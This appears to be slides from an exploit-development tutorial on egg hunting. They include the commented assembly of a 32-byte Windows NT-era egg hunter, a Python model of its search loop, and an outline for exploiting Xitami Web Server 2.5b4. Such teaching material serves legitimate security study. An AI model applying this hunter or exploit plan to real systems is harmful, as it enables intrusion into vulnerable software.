Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
5. @ajinabraham
SOME TERMS RELATED TO EGG HUNTING
Tag: A unique 4-byte string that acts as a marker to search for and locate
the shellcode.
Egg: An 8-byte string formed by combining two tags; the resulting layout is
tag+tag+shellcode.
Egg Hunter: A small piece of code placed in the limited buffer, which
searches the entire stack or heap for the tag to locate the shellcode and
finally executes it.
The Egg and the Egg Hunter are also part of the shellcode.
The bad character restrictions apply to the egg hunter instructions too.
6. @ajinabraham
What is Egg Hunting?
Egg hunting is a useful exploitation technique used to
overcome the deficiency of a small buffer that cannot hold our
lengthy shellcode.
We might have access to some large buffer somewhere else in memory.
We prepend a 4-byte tag twice, forming an 8-byte egg, to our shellcode
and place it in the large buffer.
Now we fill the small buffer with a jump instruction to the egg
hunter. The egg hunter then searches the stack or the heap for
two consecutive tags, finds the shellcode and executes it.
14. @ajinabraham
NtAccessCheckAndAuditAlarm
00000000 6681CAFF0F or dx,0xfff
00000005 42 inc edx
00000006 52 push edx
00000007 6A02 push byte +0x2
00000009 58 pop eax
0000000A CD2E int 0x2e
0000000C 3C05 cmp al,0x5
0000000E 5A pop edx
0000000F 74EF jz 0x0
00000011 B86C78786C mov eax,0x6C78786C #TAG (lxxl)
00000016 8BFA mov edi,edx
00000018 AF scasd
00000019 75EA jnz 0x5
0000001B AF scasd
0000001C 75E7 jnz 0x5
0000001E FFE7 jmp edi
Size: 32 bytes
Targets: Windows NT/2000/XP/2003
Egg Size: 8 bytes
The only difference between the NtDisplayString and NtAccessCheckAndAuditAlarm
hunters is the syscall each uses to check whether an access violation occurred.
16. @ajinabraham
NtDisplayString / NtAccessCheckAndAuditAlarm
6681CAFF0F or dx,0x0fff ; get last address in page
42 inc edx ; acts as a counter (increments the value in EDX)
52 push edx ; pushes edx value to the stack
; (saves our current address on the stack)
6A43 push byte +0x43 ; push 0x43 for NtDisplayString
; or 0x2 for NtAccessCheckAndAuditAlarm to stack
58 pop eax ; pop 0x43 or 0x2 into eax
; so it can be used as parameter to syscall
CD2E int 0x2e ; make a syscall using the previous register
3C05 cmp al,0x5 ; check if access violation occurs
; (0xc0000005== ACCESS_VIOLATION)
5A pop edx ; restore edx
74EF je xxxx ; page not readable: jump back to start (or dx,0x0fff)
B86C78786C mov eax,0x6C78786C ; tag (lxxl)
8BFA mov edi,edx ; set edi to our pointer
AF scasd ; compare for status
75EA jnz xxxxxx ; (back to inc edx) check egg found or not
AF scasd ; when egg has been found
75E7 jnz xxxxx ; (jump back to "inc edx") ; if only the first egg was found
FFE7 jmp edi ; edi points to begin of the shellcode
Credits: corelanc0d3r
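As an added illustration (not code from the slides or from corelanc0d3r), the search loop of the hunter above modelled in Python: a constructed memory image with one unmapped page and a single stray copy of the tag shows why both the syscall check and the doubled tag are needed. PAGE, hunt and build_image are names of this example's own choosing; the unmapped-page set stands in for the ACCESS_VIOLATION result of the syscall.

```python
from __future__ import annotations

# Added example, not from the slides: a simplified model of the
# NtDisplayString / NtAccessCheckAndAuditAlarm egg hunter's search loop.
PAGE = 0x1000
TAG = b"lxxl"          # 0x6C78786C little-endian, as in mov eax,0x6C78786C
EGG = TAG + TAG        # 8-byte egg that precedes the shellcode


def hunt(memory: bytes, unmapped_pages: set[int], start: int = 0) -> int | None:
    """Return the address of the shellcode (first byte after the egg), or None.

    Mirrors the hunter: when the syscall reports an access violation for the
    current page, skip to the next page (or dx,0x0fff; inc edx); otherwise
    compare one dword at a time (scasd), advancing one byte per miss (inc edx).
    """
    addr = start
    while addr + 8 <= len(memory):
        if (addr // PAGE) in unmapped_pages:
            addr = (addr | 0x0FFF) + 1      # ACCESS_VIOLATION: next page boundary
            continue
        if memory[addr:addr + 4] != TAG:    # first scasd: tag not at edi
            addr += 1
            continue
        if memory[addr + 4:addr + 8] != TAG:  # second scasd: only one tag here
            addr += 1                       # e.g. the hunter's own mov eax,<tag>
            continue
        return addr + 8                     # jmp edi: edi now points past the egg
    return None


def build_image() -> tuple[bytes, set[int]]:
    """Constructed memory image: page 0 holds a single copy of the tag (like the
    hunter's own mov eax,<tag>), page 1 is unmapped, page 2 holds the egg."""
    hunter_like = b"\x90" * 0x100 + b"\xb8" + TAG + b"\x90" * (PAGE - 0x105)
    unmapped = b"\x00" * PAGE
    shellcode = b"\xcc" * 16                # constructed placeholder payload
    egg_page = b"\x41" * 0x20 + EGG + shellcode
    egg_page += b"\x00" * (PAGE - len(egg_page))
    return hunter_like + unmapped + egg_page, {1}


if __name__ == "__main__":
    mem, unmapped = build_image()
    print(hex(hunt(mem, unmapped)))         # 0x2028: the byte after the egg
```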
17. @ajinabraham
Limitation of these Egg hunters
The SEH, IsBadReadPtr, NtDisplayString and
NtAccessCheckAndAuditAlarm hunters will work only on
Windows NT/2000/XP/2003.
So you can't use these Egg Hunter
implementations on later builds of Windows
like 7 and 8.
18. @ajinabraham
Let's build up an Exploit
Software: Xitami Web Server 2.5b4
Egg Hunter Implementation: NtAccessCheckAndAuditAlarm
(32-byte hunter and 8-byte egg)
20. @ajinabraham
Egg Hunter Implementation (diagram)
EIP: overwritten with JMP ESP
ESP: JMP to reach the Egg Hunter (jump to some location with enough buffer)
Egg Hunter: search for the Egg, find it and execute the shellcode
Egg + Shellcode: placed in the large buffer